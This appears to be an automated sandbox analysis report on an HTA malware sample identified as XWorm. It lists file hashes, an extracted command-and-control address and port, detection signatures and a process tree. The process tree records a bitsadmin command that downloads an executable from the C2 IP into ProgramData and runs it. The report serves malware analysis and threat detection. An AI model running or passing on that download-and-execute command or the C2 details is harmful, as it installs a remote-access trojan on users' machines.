Analysis
-
max time kernel
147s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
02/04/2024, 18:09
Static task
static1
Behavioral task
behavioral1
Sample
e81963d4c5a431f529c7669d3595a943.hta
Resource
win7-20240319-en
9 signatures
150 seconds
General
-
Target
e81963d4c5a431f529c7669d3595a943.hta
-
Size
834B
-
MD5
e81963d4c5a431f529c7669d3595a943
-
SHA1
82ac49f24caad73263ae461a2c1c7546b1ba9ded
-
SHA256
cf6cab6b405f7e849e6585f6f4c1ae3fd155b75d8ceb197bd0cf46a9b4c5f91b
-
SHA512
2ba83def4a81ede89bd54a5c0d4b4592985c13a10507b9a2dfb45c46e6e234d54dc14f98562eb2d3d3766e28290e83175c098a6203dd52effacc0176da7bb209
Malware Config
Extracted
Family
xworm
C2
210.246.215.82:7000
Attributes
-
Install_directory
%ProgramData%
-
install_file
WindowsNT.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/4260-0-0x0000000000FE0000-0x000000000103A000-memory.dmp family_xworm -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation mshta.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 28 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 1924 bitsadmin.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4260 s.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 5024 wrote to memory of 1924 5024 mshta.exe 88 PID 5024 wrote to memory of 1924 5024 mshta.exe 88 PID 5024 wrote to memory of 1924 5024 mshta.exe 88 PID 5024 wrote to memory of 4260 5024 mshta.exe 100 PID 5024 wrote to memory of 4260 5024 mshta.exe 100
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\e81963d4c5a431f529c7669d3595a943.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://210.246.215.82/s.exe C:\ProgramData\s.exe2⤵
- Download via BitsAdmin
PID:1924
-
-
C:\ProgramData\s.exe"C:\ProgramData\s.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4260
-